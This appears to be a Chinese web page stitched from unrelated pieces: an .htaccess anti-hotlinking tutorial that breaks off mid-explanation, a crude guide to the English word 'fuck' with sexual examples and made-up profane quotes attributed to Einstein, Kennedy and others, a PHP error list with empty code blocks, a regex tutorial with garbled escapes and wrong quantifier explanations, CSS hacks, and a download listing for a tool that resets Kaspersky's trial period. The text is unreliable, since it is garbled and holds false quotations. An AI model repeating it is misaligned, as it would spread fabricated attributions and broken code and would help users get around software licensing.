使用.htaccess防盗链实战
先解释一下图片防盗链和转向:
图片防盗链有什么用?
防止其它网站盗用你的图片,浪费你宝贵的流量。
图片转向有什么用?
如果你的网站以图片为主,哪天发现月底没到流量就快用光了,那就可以利用图片转向,在不修改网页的前提下,把图片下载请求转向到其它空间(比如试用主机),临时过渡。
下面开始讲解,比如你的图片都在img目录下,那就在该目录下放一个名为 .htaccess 的文件,内容如下:
RewriteCond %{HTTP_REFERER} !^$ [NC]
RewriteCond %{HTTP_REFERER} !oneter.com [NC]
RewriteCond %{HTTP_REFERER} !zhuaxia.com [NC]
RewriteCond %{HTTP_REFERER} !google.com [NC]
RewriteCond %{HTTP_REFERER} !baidu.com [NC]
RewriteCond %{HTTP_REFERER} !bloglines.com [NC]
RewriteRule .(jpg|gif|png|bmp|swf|jpeg) /image/replace.gif [R,NC,L]
RewriteRule ^(.*)$ http:\/\/image.simcole.cn\/image\/$1 [L]
大概解释下:
RewriteCond %{HTTP_REFERER} !oneter.com [NC]
RewriteCond %{HTTP_REFERER} !zhuaxia.com [NC]
RewriteCond %{HTTP_REFERER} !google.com [NC]
RewriteCond %{HTTP_REFERER} !baidu.com [NC]
RewriteCond %{HTTP_REFERER} !bloglines.com [NC]
这部分是判断是否盗链,如果以上条件都成立(即访问图片的请求,既不是直接输入网址,也不是来自simcole.cn,也不是来自 zhuaxia.com,也不是来自google.com,也不是来自baidu.com,也不是来自bloglines.com 的话),就执行下列转向:
意思是让所有盗链 img 目录下 jpg、gif、png、bmp、swf、jpeg 文件的网页,显示的图片都用 image 目录下的 replace.gif 图片替换掉。注意替换显示的图片不要放在设置防盗链的 img 目录下。如果照上面的规则判断出图片请求不是盗链的,就执行以下转向:
be fucked
严格的语法上来说呢,这个就是fuck的被动语态,8过实际应用中只要不是很顺心的状况呢,都可以用。一般对人不对事。有人倒霉了,基本上就是he's fucked了。
fucking
语法中有动词进行式做形容词的用法。这个fuck一加上ing的话就是包治百病天下无双了……基本上所有的名词都可以形容。最为顺口的就是fucking asshole了。
fuck you
最常见的用法,矛头直指对方,快意恩仇。发音简单一学就会,一句在口可以走遍美国了。如果跟对方没什么计较的话fuck哪个也都可以,fuck him, fuck her, fuck them, fuck the states, fuck the world, 不过总是没有fuck you来得理直气壮言简意赅。
fuck me
嘿嘿,这个,一般只在特定场合特定行为中由特定人物表达。简单来说,就是女性叫床专用……各位同学大家知道就可以了,这个,不用反复操练的……
fuck up
搞砸了,一般对事不对人,类似表达可以用screw up。
fuck off
收声闭嘴之极度表达。以程度类推效果大于hold your tounge大于shut up大于watch your mouth。
fuck with nb.
对某人找茬,故意戏弄某人。这个……大家千万不要误解为与某人XX……
fuck you very much
这里的fuck you就比较活络了。不看语气和表情就很难判断对方的意图。因为他很有可能是在用另外一种方式说“thank you very much”。
motherfucker
跟老外比起来我们中华民族泱泱大国就文明多了。就算问候对方家长也是身体力行,或者“X你妈”或者“X你大爷”,老外比较懒,这些事情也都交给被骂的家伙去办了……
"Fuck" 是现代英语中最强烈,最有争议的粗语之一,这个词可能也是世界上最著名的亵渎语但何时这个词从一个友好用法变成亵渎用法却仍然无法解释一些证明显示,在一些英语为母语的地区,这个词直到17世纪才有一种攻击和亵渎的含义; 而另外一些证明却表明,早在16世纪的英国,这个词已经变成粗语因此一些诸如牛津大英字典的权威资料仍然无法确定这个粗语的来源,但倾向于相信撒克逊人 (英国人)起源说,然后再流传到英国殖民地,再到全世界
在现代英语中,"Fuck"是一种高度冒犯性的用词,是最为严厉的4字母词"Fuck" 原意就是XXXXX(操,干),但它往往被用作一个咒骂语和语气加强词一些"Fuck"原意的例子有:
"Let s fuck." (让我们操吧)
"That was a good fuck." (那真是一次美妙的XXXXX)
"I cant believe shes fucking him!" (我不能相信她正在操他!)
"I fucked my teacher!" (我干了我老师)
其他则是一些粗直语用法,但这些用法往往牵涉到性,譬如XXXXXX(fuck you)或者自慰(fuck yourself).
"Fuck you!" or "Go fuck yourself!" (我不喜欢你,快滚开)
"He"s a dumb fuck." (他是个白痴)
"Sorry, I fucked up your computer." (不好意思,我弄坏了你的电脑)
"He s pretty fucked up." (他心理或者心情不稳定)
"I fucked up on this test." (我这次测验做的很糟)
"Lets fuck around for a couple hours." (让我们浪费2个小时好了)
"Im fucked." (结果)
"What the fuck!" (到底刚才发生了什么?)
"Shut the fuck up!" (闭嘴)
"Im so fucked up right now." (我已经烂醉或者被药物搞的晕晕乎乎了)
其他一些粗直用法则没有任何冒犯或者牵涉到性的意思而且当这个词被移除之后,这句句子的语意仍然保持不变譬如:
"None of your fucking business!" (不关你"鸟"事)
"Un-fucking-believable!" (真难以置信!)
"What a fucking great day outside!" (外边的天气真"他妈的"的好)
2 fuck的用法小结
"Shut the fuck up!" (你他妈的闭嘴
"Abso-fuckin-lutley!" "绝对是!"
"Hey!, Why dont you go outside and play Hide-N-Go-Fuck-Yourself!" "嘿,为什么你不出去自己一个人玩?
"Fuck!" (当一些不快的事情发生)
"Hes a great fucker!" (他是一个非常好的家伙,并不意思他是一个非常好的性伙伴)
在最后一个例子中,"Fucker"这个词被用作一种赞赏,但这种用法并不常见譬如: "You are a smart fucker (你是一个聪明的家伙)". 但正因为这种用法的粗鲁及不明确性, 除非对方是一个你非常熟悉的朋友,这个用法还是不要用的好因为有可能你的赞赏会被误解
"Fuck"这个词也是非常多样化的,譬如:
"Fucking fuck those fucking fuckers!" ("忘记那些另人讨厌的家伙吧.") "Fucking fuckers fucking fucked!" ("它被弄坏了")
第二个例子很好的演示了这个词的多样性,它是一个名词,一个冠词,一个现在分词和一个形容词另外一个可以显示其多样性的例子是Mary Prankster 的歌:Mercyfuck (1998)
I wish I could fuck all my sorrow away
And fuck til the dawn of the next fucking day
Fuck the chorus and verse, fuck the pain getting worse
Fuck it all til I burn
I wish I could fuck all of you til you see
Im the worst fuck-up in all history
Fuck your image and mine, fuck your limp valentine
Fuck it all til I learn
再补充一下"Fuck"这个词的常用法:
动词
可以当作一个及物动词:
He fucked her. (他操了她.)
或者不及物动词:
They fucked all night. (他们干了整个晚上)
或者对象非人的用法:
Im not going down there, fuck that, dude! (我不会下去的,操那东西,哥们!)
Im not doing that. Fuck outta here! (我不会做的,忘记它吧!)
名词
She is a real fuck. (没有特定的侮辱)
She is a good fuck. (特定的指向XXXXXX)
Eat my fuck. (是一种侮辱)
We had a good fuck last night. (作为一个性行为)
That was a total cluster fuck. (很多出错的事的当中一个)
Oh my fuck! (表明一种惊讶的意思)
Im being sent to Bumfuckegypt. (很有可能出自一个军事源头)
感叹词
Fuck作为感叹词时一般表示一种惊讶,不满或者愤怒的意思, 如:
Fuck! A punctured tire!
也可以表示一种正向的惊讶:
Fuck! Theyve hacked this computer! (噢!他们黑了这台电脑!)
Fuck! This is the best movie EVER! (噢!这是历史上最好的电影!)
现在分词
作为现在分词,Fucking (fuckin) 往往用来加强一个动词或者名词的语气它的正向意义往往多于其反向意义如:
My fucking boss made me work all weekend. (我那天杀的老板让我加整个周末的班)
She is fuckin hot. (她真他妈的性感)
除此之外,Fuck的现在分词有时被插在一个词的中间这种用法叫作感叹插入语. 这种fucking插入法的规则是: "fucking"只能插入到一个多音节词的韵脚之间, 例如:
that was abso-fuckin-lutely cool! (那真他妈的酷!)
In-fucking-credible (难以置信)
fan-fucking-tastic (真棒)
un-fucking-believable (无法相信)
congratu-fucking-lations (祝贺祝贺)
whoop-dee-fucking-doo (%@@#@#)
过去分词
fuck的过去分词意思一样完全无用的,被损坏的,或者被搞糟的事物在形容一个人的时候,它表示一种筋疲力尽或者烂醉的意思 譬如:
The hard drive 无效ed, so now the database is fucked. (硬盘坏了所以现在数据库也被损坏了)
Your engines fucked because you forgot to change the oil! (你的引擎坏了,因你忘记换油了)
Now that the electricity is out, your computer is fucked. (没电了,你的电脑没用了)
3 fuck的用法小结
You were completely fucked last night. (你昨晚真是糟糕透了)
动词短语
"To fuck up"意思是破坏,"to be fucked up"往往意思烂醉,或者更正规的意思是身体或者心理上的伤害(常用于美国) 如:
The bouncer really fucked up that guy who kept causing trouble. (那个保镖把那个老是滋事的家伙打的够呛)
My sisters been really fucked up since her fiancé dumped her. 我的姐姐(妹妹)惨极了,因为她的未婚夫抛弃了她
当在形容事物的时候,"to be fucked up"意思是这件事物是精神上或者其他方面上错误的
She stole my wallet while I was passed out; thats so fucked up! (在我走出去的时候,她偷了我的钱包;那绝对是件错误的事)
"To fuck over" 意思背叛,或者通常不讨人喜欢的行为
Yeah, he slept with my girlfriend. I cant believe he fucked me over like that! (他睡了我GF,我真的无法相信他如此背叛我!)
I got fucked over at work today – they promoted my assistant instead of me. (今天我在上班的时候被玩了: 他们提升了我助理,而不是我!)
混成词
F的发音有时被提高语调,以表示强烈的辱骂
Thats fugly (fucking ugly). (那真他妈的丑)
You fucktard (fucking retard). (你他妈的智障)
You flooser! (fucking loser) (你他妈的失败者)
讲演语气
Fuck有时在讲演时被用作一种填补,用法很象um..., 或者like..
Her name is, fuck... What was her name again? (她的名字是,恩,她的名字是什么?)
the fuck 常用来加强语气,类似于“到底”、“究竟”、“the heck”、“on
earth”
、“the hell”等,在疑问词后。
例1 熟人间的问候: "How the fuck are ya?"
例2 疑问: "What the fuck is(are).......?"
例3 不满: "What the fuck is going on here?"
例4 迷惘: "Where the fuck are we."
例5 担心: "Let's get the fuck out of here."
例6 怀疑: "How the fuck did you do that?"
get fucked , be fucked 被骗;遇到麻烦
例7: "I got fucked by the car dealer."
例8: "I guess I'm fucked now."
Fucked again 表示绝望,“完了……”
Fuck it 屈从,放弃
例9: "Oh, fuck it!"
Fuck you ! 不用多解释了
Fuck me. 表示厌恶 类似“sth disgusts me”
fucking 类似 the fuck ,作加强语气,不过还可作形容词,表示一些不爽的事物
例10: "I don't understand this fucking business!"
例11:根本不想 "I didn't fucking do it."
例12:骂人反击 "Up your fucking arse!"
"He's a fucking asshole."
例13:当然也有表示高兴的时候,类似于“我他妈……” "I fucking couldn't
be ha
ppier."
例14:放在一个词的中间(注意这种用法哦,国内较少见)增强语气:
"UNFUCKINGBELI
EVABLE!"
例15:表示时间 "It's five fucking thirty."
Fuck off. “滚开” 类似“go away”
Fuck around. 胡闹 “Quit ye fucking around!”
Fuck up. 弄砸了 “How did you fuck your exam up?”
Fuck with 干涉 类似于“interfere with”
be fucked out 疲劳的,类似于“exhausted”
fuck 单独的用法:
例16:几乎 "I know fuck all about it."
例17: 谁在乎过我了?"Who really gives a fuck, anyhow?"
FUCK 一词并不邪恶,没有一些女生想象的那么坏,它在美国人的口语中出现的频
率很高,就如同我们常说的“我KAO”。下面列举了一些名人说话中用过的FUCK:
广岛市市长 "What the fuck was that?"
4 fuck的用法小结
Custer 上将 "Where did all these fucking Indians come from?"
泰坦尼克号船长 "Where the fuck is all this water coming from?"
约翰.列农 "That‘s not a real fucking gun."
尼克森总统 "Who‘s gonna fucking find out?"
航天飞机的指挥官 "Let the fucking woman drive."
爱因斯坦"Any fucking idiot could understand that."
毕加索 "It does so fucking look like her!"
沃尔特.迪斯尼 "Fuck a duck."
艾德门德.希拉里 "Why?- Because its fucking there!"
约翰.肯尼迪 "I need this parade like I need a fucking hole in my
head."
perhaps one of the most interesting words in the English Language today is the word "Fuck".
也许英文中最有趣的单词之一就是今天要讲的Fuck。
Out of all of the English words that begin with the letter "F", Fuck is the only word that is refer to as the F-Word.
在所有以F开头的英文单词中,Fuck是唯一会被称为“那个以F开头的单词”。
It"s the one magical word just by its sound can describe pain, pleasure, hate and love.
这是一个神奇的词,仅仅通过它的发音就可以表达痛苦、愉悦、仇恨和喜爱。
Fuck, as most words in the English language is derived from German the word "frichen" which means "to strike".
Fuck正如大多数英语单词一样,来源于一个德语单词"Frichen",这个单词的意思是“击打”。
In English Fuck falls into many grammatical categories.
在英语中,Fuck又有多种用法。
As a transitive verb , for instance, "John Fucked Shirley"; as a intransitive verb, "Shirley Fucks. "
作为一个及物动词,例如,John**Shirley;作为一个不及物动词,Shirley***。
Its meanings not always sexual.
它的意思并不总是和性有关。
It can be used as an adjective such as "John"s doing all the Fucking work".
它可以作为一个形容词,例如:John正在做所有TMD该死的工作。
As an adverb, "Shirley talks too Fucking much."
作为一个副词,Shirley的话真是太TMD多了。
As an adverb enhancing and adjective, "Shirley is Fucking beautiful".
作为副词或形容词时如果用升调读出,Shirley真是太TMD漂亮了。
As a noun, "I don"t give a Fuck".
作为一个名词,我才不TMD管那么多。
As part of a word, "abso-Fucking-lutely" or "in-Fucking-credible".
作为词语的一部分,如TMD完全的,TMD难以置信的。
And as almost every word in a sentence "Fuck the Fucking Fuckers".
也可以被放在同一个句子中,**这个**的**
As you must realise there aren"t too many words with the versatility of Fuck, as in these examples describing situations such as:
你应该注意到了,没有太多的单词像Fuck这样有多种功能,在如下的例子中描述不同的情况,如:
Fraud : "I got Fucked by the car dealer."
受骗:我被车贩子骗了。
Dismay: "Ah Fuck it" .
沮丧:我*
Trouble: "I guess I"m really Fucked now" .
麻烦:我猜我这次真的栽了。
Aggression: "Don"t Fuck with me body" .
挑衅:小子,不关你的事。
Difficulty: "I don"t understand this Fucking question"
困难:我不明白这个TMD问题。
Inquiry: "Who the Fuck was that?"
质疑:那TMD是谁?
Dissatisfaction: "I don"t like what the Fuck is going on here"
不满:我不喜欢这里正在发生的$%$&%^&
Incompetence: "He"s a Fuck up"
无奈:他就是一个**
Dismissal: "Why don"t you go outside and play hide and go Fuck yourself?"
打发:你为什么不出去$^$^#^#
I"m sure you can think of much more examples.
我肯定你还可以想到更多例子。
With all of these multipurpose applications, how can anyone be offended when you use the word?
在各种各样的情况下,怎么用这个词得罪别人呢?
We say use this unique flexible word more often in your daily speech.
我们可以在日常对话中更多的使用这个唯一的多样的词。
It will identify the quality of your character immediately.
它能立即让你显得有性格。
Say it loudly and proudly——FUCK YOU!
一些错误代码含义详解
错误类型:
一、未使用二进制上传
| 代码: | [拷贝到剪贴板] | |
| ||
二、数据表中缺少字段
| 代码: | [拷贝到剪贴板] | |
| ||
三、服务器限制了网站使用内存的大小为8M,现在已经超过
| 代码: | [拷贝到剪贴板] | |
| ||
五、数据库表不存在
| 代码: | [拷贝到剪贴板] | |
| ||
六、 未安装或者数据库的用户名密码错误
| 代码: | [拷贝到剪贴板] | |
| ||
七、查询语句有错误
| 代码: | [拷贝到剪贴板] | |
| ||
八、文件过期
| 代码: | [拷贝到剪贴板] | |
| ||
九、数据库出错,需要修复数据库或者重新启动数据库?
| 代码: | [拷贝到剪贴板] | |
| ||
十、
| 代码: | [拷贝到剪贴板] | |
| ||
十一、这是语言管理中的language表里面有些字段没有引号,有些新增模块有这样的问题
| 代码: | [拷贝到剪贴板] | |
| ||
出现错误的查询信息是
UPDATE boka_language
十二、不存在此函数
| 代码: | [拷贝到剪贴板] | |
| ||
十三、服务器执行时间超时.修改php.ini里的设置
| 代码: | [拷贝到剪贴板] | |
| ||
十四、调用了不存在的类
| 代码: | [拷贝到剪贴板] | |
| ||
十五、ZEND版本不匹配?
| 代码: | [拷贝到剪贴板] | |
| ||
十六、不能建立windows下的Mysql服务进程
| 代码: | [拷贝到剪贴板] | |
| ||
十七、数据表错误,修复数据表.(检查数据库的表。通过phpmyadmin即可修复)
| 代码: | [拷贝到剪贴板] | |
| ||
十七,环境zend未安装
| 代码: | [拷贝到剪贴板] | |
| ||
十八,安装是没有任何反应,输入install.php面空白。
环境错误提示被屏蔽,察看文件是否用二进制传送或者是zend是否有安装。
十九、数据库出现
| 代码: | [拷贝到剪贴板] | |
| ||
数据库链接数太多,修改mysql的最大链接数。
二十、输入安装install.php提示
install.php 不允许执行原因是:
脚本权限错误:不能设置为同组可写!
服务器端配置:
Server Administrator/Contact: [no address given]
Server Name: www.***.com
Server Port: 80
Server Protocol: HTTP/1.1
访问请求数据:
User Agent/Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)
Request Method: GET
Remote Address: 221.222.177.106
Remote Port: 30066
请检查install.php的文件属性是否为644。
二十一、访问页面提示:
| 代码: | [拷贝到剪贴板] | |
| ||
这个错误是由于数据库恢复不正常。请核实2个数据库的版本是否一致。
二十二、在2003下执行install.php文件,点击"下一步"的按钮点击不下去.
请检查2003下的IE的安全设置为中。
跟我学正则表达式! 半小时精通正则表达式!
开篇,还是得说说 ^ 和 $ 他们是分别用来匹配字符串的开始和结束,以下分别举例说明
"^The": 开头一定要有"The"字符串;
"of despair$": 结尾一定要有"of despair" 的字符串;
那么,
"^abc$": 就是要求以abc开头和以abc结尾的字符串,实际上是只有abc匹配
"notice": 匹配包含notice的字符串
你可以看见如果你没有用我们提到的两个字符(最后一个例子),就是说 模式(正则表达式) 可以出现在被检验字符串的任何地方,你没有把他锁定到两边
接着,说说 '*', '+',和 '?',
他们用来表示一个字符可以出现的次数或者顺序. 他们分别表示:
"zero or more"相当于{0,},
"one or more"相当于{1,},
"zero or one."相当于{0,1}, 这里是一些例子:
"ab*": 和ab{0,}同义,匹配以a开头,后面可以接0个或者N个b组成的字符串("a", "ab", "abbb", 等);
"ab+": 和ab{1,}同义,同上条一样,但最少要有一个b存在 ("ab", "abbb", 等.);
"ab?":和ab{0,1}同义,可以没有或者只有一个b;
"a?b+$": 匹配以一个或者0个a再加上一个以上的b结尾的字符串.
要点, '*', '+',和 '?'只管它前面那个字符.
你也可以在大括号里面限制字符出现的个数,比如
"ab{2}": 要求a后面一定要跟两个b(一个也不能少)("abb");
"ab{2,}": 要求a后面一定要有两个或者两个以上b(如"abb", "abbbb", 等.);
"ab{3,5}": 要求a后面可以有2-5个b("abbb", "abbbb", or "abbbbb").
现在我们把一定几个字符放到小括号里,比如:
"a(bc)*": 匹配 a 后面跟0个或者一个"bc";
"a(bc){1,5}": 一个到5个 "bc."
还有一个字符 '│', 相当于OR 操作:
"hi│hello": 匹配含有"hi" 或者 "hello" 的 字符串;
"(b│cd)ef": 匹配含有 "bef" 或者 "cdef"的字符串;
"(a│b)*c": 匹配含有这样多个(包括0个)a或b,后面跟一个c
的字符串;
一个点('.')可以代表所有的单一字符,不包括"n"
如果,要匹配包括"n"在内的所有单个字符,怎么办?
对了,用'[n.]'这种模式.
"a.[0-9]": 一个a加一个字符再加一个0到9的数字
"^.{3}$": 三个任意字符结尾 .
中括号括住的内容只匹配一个单一的字符
"[ab]": 匹配单个的 a 或者 b ( 和 "a│b" 一样);
"[a-d]": 匹配'a' 到'd'的单个字符 (和"a│b│c│d" 还有 "[abcd]"效果一样); 一般我们都用[a-zA-Z]来指定字符为一个大小写英文
"^[a-zA-Z]": 匹配以大小写字母开头的字符串
"[0-9]%": 匹配含有 形如 x% 的字符串
",[a-zA-Z0-9]$": 匹配以逗号再加一个数字或字母结尾的字符串
你也可以把你不想要得字符列在中括号里,你只需要在总括号里面使用'^' 作为开头 "%[^a-zA-Z]%" 匹配含有两个百分号里面有一个非字母的字符串.
要点:^用在中括号开头的时候,就表示排除括号里的字符
为了PHP能够解释,你必须在这些字符面前后加'',并且将一些字符转义.
不要忘记在中括号里面的字符是这条规路的例外—在中括号里面, 所有的特殊字符,包括(''), 都将失去他们的特殊性质 "[*+?{}.]"匹配含有这些字符的字符串.
还有,正如regx的手册告诉我们: "如果列表里含有 ']', 最好把它作为列表里的第一个字符(可能跟在'^'后面). 如果含有'-', 最好把它放在最前面或者最后面, or 或者一个范围的第二个结束点[a-d-0-9]中间的‘-’将有效.
看了上面的例子,你对{n,m}应该理解了吧.要注意的是,n和m都不能为负整数,而且n总是小于m. 这样,才能 最少匹配n次且最多匹配m次. 如"p{1,5}"将匹配 "pvpppppp"中的前五个p
下面说说以开头的
b 书上说他是用来匹配一个单词边界,就是...比如'veb',可以匹配love里的ve而不匹配very里有ve
B 正好和上面的b相反.例子我就不举了
好,我们来做个应用:
如何构建一个模式来匹配 货币数量 的输入
构建一个匹配模式去检查输入的信息是否为一个表示money的数字。我们认为一个表示money的数量有四种方式: "10000.00" 和 "10,000.00",或者没有小数部分, "10000" and "10,000". 现在让我们开始构建这个匹配模式:
^[1-9][0-9]*$
这是所变量必须以非0的数字开头.但这也意味着 单一的 "0" 也不能通过测试. 以下是解决的方法:
^(0│[1-9][0-9]*)$
"只有0和不以0开头的数字与之匹配",我们也可以允许一个负号在数字之前:
^(0│-?[1-9][0-9]*)$
这就是: "0 或者 一个以0开头 且可能 有一个负号在前面的数字." 好了,现在让我们别那么严谨,允许以0开头.现在让我们放弃 负号 , 因为我们在表示钱币的时候并不需要用到. 我们现在指定 模式 用来匹配小数部分:
^[0-9]+(.[0-9]+)?$
这暗示匹配的字符串必须最少以一个阿拉伯数字开头. 但是注意,在上面模式中 "10." 是不匹配的, 只有 "10" 和 "10.2" 才可以. (你知道为什么吗)
^[0-9]+(.[0-9]{2})?$
我们上面指定小数点后面必须有两位小数.如果你认为这样太苛刻,你可以改成:
^[0-9]+(.[0-9]{1,2})?$
这将允许小数点后面有一到两个字符. 现在我们加上用来增加可读性的逗号(每隔三位), 我们可以这样表示:
^[0-9]{1,3}(,[0-9]{3})*(.[0-9]{1,2})?$
不要忘记 '+' 可以被 '*' 替代 如果你想允许空白字符串被输入话 (为什么?). 也不要忘记反斜杆 ’’ 在php字符串中可能会出现错误 (很普遍的错误).
现在,我们已经可以确认字符串了, 我们现在把所有逗号都去掉 str_replace(",", "", $money) 然后在把类型看成 double然后我们就可以通过他做数学计算了.
再来一个:
构造检查email的正则表达式
在一个完整的email地址中有三个部分:
1. 用户名 (在 '@' 左边的一切),
2.'@',
3. 服务器名(就是剩下那部分).
用户名可以含有大小写字母阿拉伯数字,句号 ('.'), 减号('-'), and 下划线 ('_'). 服务器名字也是符合这个规则,当然下划线除外.
现在, 用户名的开始和结束都不能是句点. 服务器也是这样. 还有你不能有两个连续的句点他们之间至少存在一个字符,好现在我们来看一下怎么为用户名写一个匹配模式:
^[_a-zA-Z0-9-]+$
现在还不能允许句号的存在. 我们把它加上:
^[_a-zA-Z0-9-]+(.[_a-zA-Z0-9-]+)*$
上面的意思就是说: "以至少一个规范字符(除了.)开头,后面跟着0个或者多个以点开始的字符串."
简单化一点, 我们可以用 eregi()取代 ereg().eregi()对大小写不敏感, 我们就不需要指定两个范围 "a-z" 和 "A-Z" – 只需要指定一个就可以了:
^[_a-z0-9-]+(.[_a-z0-9-]+)*$
后面的服务器名字也是一样,但要去掉下划线:
^[a-z0-9-]+(.[a-z0-9-]+)*$
好. 现在只需要用”@”把两部分连接:
^[_a-z0-9-]+(.[_a-z0-9-]+)*@[a-z0-9-]+(.[a-z0-9-]+)*$
这就是完整的email认证匹配模式了,只需要调用
eregi(‘^[_a-z0-9-]+(.[_a-z0-9-]+)*@[a-z0-9-]+(.[a-z0-9-]+)*$ ’,$eamil)
就可以得到是否为email了
正则表达式的其他用法
提取字符串
ereg() and eregi() 有一个特性是允许用户通过正则表达式去提取字符串的一部分(具体用法你可以阅读手册). 比如说,我们想从 path/URL 提取文件名 – 下面的代码就是你需要:
ereg("([^/]*)$", $pathOrUrl, $regs);
echo $regs[1];
高级的代换
ereg_replace() 和 eregi_replace()也是非常有用的: 假如我们想把所有的间隔负号都替换成逗号:
ereg_replace("[ nrt]+", ",", trim($str));
最后,我把另一串检查EMAIL的正则表达式让看文章的你来分析一下.
"^[-!#$%&'*+./0-9=?A-Z^_`a-z{|}~]+'.'@'.'[-!#$%&'*+/0-9=?A-Z^_`a-z{|}~]+.'.'[-!#$%&'*+./0-9=?A-Z^_`a-z{|}~]+$"
如果能方便的读懂,那这篇文章的目的就达到了.
CSS兼容IE6,IE7,FireFox之一
关于CSS对各个浏览器兼容是个非常让人头疼的事情了, 网络上的教程遍地都是.今天在discuz.net上发现了一篇不错的东西,就转载过来和大家共享.可以当作CSS兼容IE6,IE7,FireFox典范了,值得去记录下。发现自己很久没有转载东西。
注:IE都能识别*;标准浏览器(如Firefox,Opera,Netscape)不能识别*;IE6能识别*,但不能识别 !important,IE7能识别*,也能识别!important;FF不能识别*,但能识别!important;
写两句代码来控制一个属性,区别Firefox与IE6:
background:orange;*background:blue;
//这一句代码写出来时,你用firefox或其它非IE浏览时,会发现,写了该代码的区域背景是橙色的,如果用IE浏览,却是蓝色的,这是因为IE都能识别*;标准浏览器(如Firefox,Opera,Netscape)不能识别*;
写两句代码来控制一个属性,区别IE7与IE6:
background:green !important;background:blue;
//这一句代码写出来时,你用IE7浏览,会发现,写了该代码的区域背景是绿色的,如果用IE6浏览,却是蓝色的,这是因为IE7能识别!important*,一但识别了,就执行,忽略了后面的那一句,但IE6却不能识别!important,所以前面部分跳过,直接执行了后半部份。
写两句代码来控制一个属性,区别Firefox与IE:
background:orange; *background:green;
//这一句代码写出来时,你用Firefox浏览,会发现背景是橙色的,而IE里却是绿色的,很简单,因为Firefox不能识别*,而IE6,IE7都可以识*
写三句代码来控制一个属性,区别Firefox,IE7,IE6:
background:orange;*background:green !important;*background:blue;
//这一句会使在Firefox在,背景呈橙色,IE7中为绿色,IE6中为蓝色,道理和前面一样,Firefox不能识别*,所以后面两句都不执行,直接执行第一句,IE7当然也能执行第一行代码,但是因为第二句,他也能识别,所以就执行了第二句代码,把前面的效果给过滤了,而最后一句,IE7是不能识别的。IE6不能识别!imprtant,本来运行了第一句代码了,第二句不能识别,那就理所当然的执行了最后一句。
注意事项:
1、float的div一定要闭合。
例如:(其中floatA、floatB的属性已经设置为float:left;)
- < #div id="floatA" >
- < #div id="floatB" >
- < #div id="NOTfloatC" >
这里的NOTfloatC并不希望继续平移,而是希望往下排。
这段代码在IE中毫无问题,问题出在FF。原因是NOTfloatC并非float标签,必须将float标签闭合。
在
- < #div class="floatB">
- < #div class="NOTfloatC">
之间加上
- < #div class="clear">
这个div一定要注意声明位置,一定要放在最恰当的地方,而且必须与两个具有float属性的div同级,之间不能存在嵌套关系,否则会产生异常。
并且将clear这种样式定义为为如下即可:
- .clear{clear:both;}
此外,为了让高度能自动适应,要在wrapper里面加上overflow:hidden;
当包含float的box的时候,高度自动适应在IE下无效,这时候应该触发IE的layout私有属性(万恶的IE啊!)用zoom:1;可以做到,这样就达到了兼容。
例如某一个wrapper如下定义:
- .colwrapper{overflow:hidden;zoom:1;margin:5px auto;}
2、margin加倍的问题。
设置为float的div在ie下设置的margin会加倍。这是一个ie6都存在的bug。
解决方案是在这个div里面加上display:inline;
例如:
- < #div id="imfloat">
相应的css为
- #IamFloat{
- float:left;
- margin:5px;/*IE下理解为10px*/
- display:inline;/*IE下再理解为5px*/}
3、关于容器的包涵关系
很多时候,尤其是容器内有平行布局,例如两、三个float的div时,宽度很容易出现问题。在IE中,外层的宽度会被内层更宽的div挤破。一定要用Photoshop或者Firework量取像素级的精度。
4、关于高度的问题
如果是动态地添加内容,高度最好不要定义。浏览器可以自动伸缩,然而如果是静态的内容,高度最好定好。(似乎有时候不会自动往下撑开,不知道具体怎么回事)
5、最狠的手段 - !important;
如果实在没有办法解决一些细节问题,可以用这个方法.FF对于”!important”会自动优先解析,然而IE则会忽略.如下
.tabd1{
background:url(/res/images/up/tab1.gif) no-repeat 0px 0px !important; /*Style for FF*/
background:url(/res/images/up/tab1.gif) no-repeat 1px 0px; /* Style for IE */}
值得注意的是,一定要将xxxx !important 这句放置在另一句之上,上面已经提过
常见兼容问题:
1.DOCTYPE 影响 CSS 处理
2.FF: div 设置 margin-left, margin-right 为 auto 时已经居中, IE 不行
3.FF: body 设置 text-align 时, div 需要设置 margin: auto(主要是 margin-left,margin-right) 方可居中
4.FF: 设置 padding 后, div 会增加 height 和 width, 但 IE 不会, 故需要用 !important 多设一个 height 和 width
5.FF: 支持 !important, IE 则忽略, 可用 !important 为 FF 特别设置样式
6.div 的垂直居中问题: vertical-align:middle; 将行距增加到和整个DIV一样高 line-height:200px; 然后插入文字,就垂直居中了。缺点是要控制内容不要换行
7.cursor: pointer 可以同时在 IE FF 中显示游标手指状, hand 仅 IE 可以
8.FF: 链接加边框和背景色,需设置 display: block, 同时设置 float: left 保证不换行。参照 menubar, 给 a 和 menubar 设置高度是为了避免底边显示错位, 若不设 height, 可以在 menubar 中插入一个空格。
9.在mozilla firefox和IE中的BOX模型解释不一致导致相差2px解决方法:
div{margin:30px!important;margin:28px;}
注意这两个margin的顺序一定不能写反,据阿捷的说法!important这个属性IE不能识别,但别的浏览器可以识别。所以在IE下其实解释成这样:
div{maring:30px;margin:28px}
重复定义的话按照最后一个来执行,所以不可以只写margin:XXpx!important;
10.IE5 和IE6的BOX解释不一致
IE5下
div{width:300px;margin:0 10px 0 10px;}
div的宽度会被解释为300px-10px(右填充)-10px(左填充)最终div的宽度为280px,而在IE6和其他浏览器上宽度则是以300px+10px(右填充)+10px(左填充)=320px来计算的。这时我们可以做如下修改
div{width:300px!important;width /**/:340px;margin:0 10px 0 10px}
关于这个/**/是什么我也不太明白,只知道IE5和firefox都支持但IE6不支持。
11.ul标签在Mozilla中默认是有padding值的,而在IE中只有margin有值所以先定义
ul{margin:0;padding:0;}
就能解决大部分问题
| 软件大小: | 316 K |
| 软件语言: | 简体中文 |
| 软件类型: | 国产软件 |
| 运行环境: | Win9x/NT/2000/XP/2003 |
| 添加时间: | 2007-9-28 14:24:00 |
| 软件评级: | ★★★ |
| 授权方式: | 免费版 |
| 开 发 商: | 文博 |
| 软件添加: | 水土不服 |
| 软件介绍: |
中秋,卡巴封了很多KEY,导致很多人不能正常使用 这个软件可以解除卡巴试用1个月的限制,永久免费使用卡巴6.0-7.0 激活那里点激活试用版本,到期一个月后使用该软件后又能再使用一个月 |
| 下载地址: |
| 点击下载=>[迅雷专用] 点击下载=>[山东电信] 点击下载=>[山东网通] 点击下载=>[浙江电信] 点击下载=>[河南网通] 点击下载=>[河南电信] |
ADSL Modem防攻击“修炼秘技”
